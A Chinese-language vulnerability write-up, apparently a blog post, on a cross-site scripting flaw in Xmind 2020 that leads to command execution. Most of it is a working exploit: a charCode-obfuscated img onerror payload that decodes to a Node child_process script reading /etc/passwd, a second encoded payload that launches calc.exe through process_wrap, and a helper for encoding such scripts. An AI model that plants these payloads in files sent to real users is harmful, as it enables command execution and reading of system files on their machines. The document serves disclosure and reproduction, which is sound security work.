xmind2020存在XSS漏洞可导致命令执行

2021-05-11 约 823 字预计阅读 2 分钟

漏洞描述

Xmind2020 存在XSS漏洞，攻击者可利用该漏洞进行命令执行。由于软件允许用户以文件形式或自定义标题标题的形式存储JS代码，攻击者可以发送带有恶意JS代码的文件。用户打开文件后，从而执行攻击者预先设定好的命令。

漏洞复现

测试环境：ubuntu18.04、xmind2020

1.打开xmind后，在思维导图模式下输入以下Payload：

1

<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>

解码后数据即为：

1
2
3
4
5
6
7


//Decode Payload
<script>
const { spawn } = require("child_process");
const cat = spawn("cat", ["/etc/passwd"]);
cat.stdout.on("data", data => {
    alert(`stdout: ${data}`);
});</script>

补充知识：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


// 1.str转unicode序列
var c = "<script>\nvar Process = process.binding('process_wrap').Process;\nvar proc = new Process();\nproc.onexit = function(a,b) {};\nvar env = process.env;\nvar env_ = [];\nfor (var key in env) env_.push(key+'='+env[key]);\nproc.spawn({file:'c:\\windows\\system32\\calc.exe',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});\n</script>"

var codeArr = [];
for(var i=0;i<c.length;i++){
    codeArr.push(c.charCodeAt(i));
}
console.log(codeArr);



// 2.unicode序列还原为str
var n = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 10, 118, 97, 114, 32, 80, 114, 111, 99, 101, 115, 115, 32, 61, 32, 112, 114, 111, 99, 101, 115, 115, 46, 98, 105, 110, 100, 105, 110, 103, 40, 39, 112, 114, 111, 99, 101, 115, 115, 95, 119, 114, 97, 112, 39, 41, 46, 80, 114, 111, 99, 101, 115, 115, 59, 10, 118, 97, 114, 32, 112, 114, 111, 99, 32, 61, 32, 110, 101, 119, 32, 80, 114, 111, 99, 101, 115, 115, 40, 41, 59, 10, 112, 114, 111, 99, 46, 111, 110, 101, 120, 105, 116, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 97, 44, 98, 41, 32, 123, 125, 59, 10, 118, 97, 114, 32, 101, 110, 118, 32, 61, 32, 112, 114, 111, 99, 101, 115, 115, 46, 101, 110, 118, 59, 10, 118, 97, 114, 32, 101, 110, 118, 95, 32, 61, 32, 91, 93, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 107, 101, 121, 32, 105, 110, 32, 101, 110, 118, 41, 32, 101, 110, 118, 95, 46, 112, 117, 115, 104, 40, 107, 101, 121, 43, 39, 61, 39, 43, 101, 110, 118, 91, 107, 101, 121, 93, 41, 59, 10, 112, 114, 111, 99, 46, 115, 112, 97, 119, 110, 40, 123, 102, 105, 108, 101, 58, 39, 99, 58, 92, 119, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101, 39, 44, 99, 119, 100, 58, 110, 117, 108, 108, 44, 119, 105, 110, 100, 111, 119, 115, 86, 101, 114, 98, 97, 116, 105, 109, 65, 114, 103, 117, 109, 101, 110, 116, 115, 58, 102, 97, 108, 115, 101, 44, 100, 101, 116, 97, 99, 104, 101, 100, 58, 102, 97, 108, 115, 101, 44, 101, 110, 118, 80, 97, 105, 114, 115, 58, 101, 110, 118, 95, 44, 115, 116, 100, 105, 111, 58, 91, 123, 116, 121, 112, 101, 58, 39, 105, 103, 110, 111, 114, 101, 39, 125, 44, 123, 116, 121, 112, 101, 58, 39, 105, 103, 110, 111, 114, 101, 39, 125, 44, 123, 116, 121, 112, 101, 58, 39, 105, 103, 110, 111, 114, 101, 39, 125, 93, 125, 41, 59, 10, 60, 47, 115, 99, 114, 105, 112, 116, 62);

console.log(n);

2.点击大纲。在大纲模式下，选中payload，按下Ctrl+C快捷键触发该Payload，执行calc命令。

修复建议

该漏洞在大纲模式下触发，Xmind 2020的使用者，谨慎打开Xmind的大纲模式。

参考

Xmind 2020 - XSS to RCE - Multiple webapps Exploit (exploit-db.com)

漏洞情报 | Xmind 2020 XSS漏洞导致命令执行 (qq.com)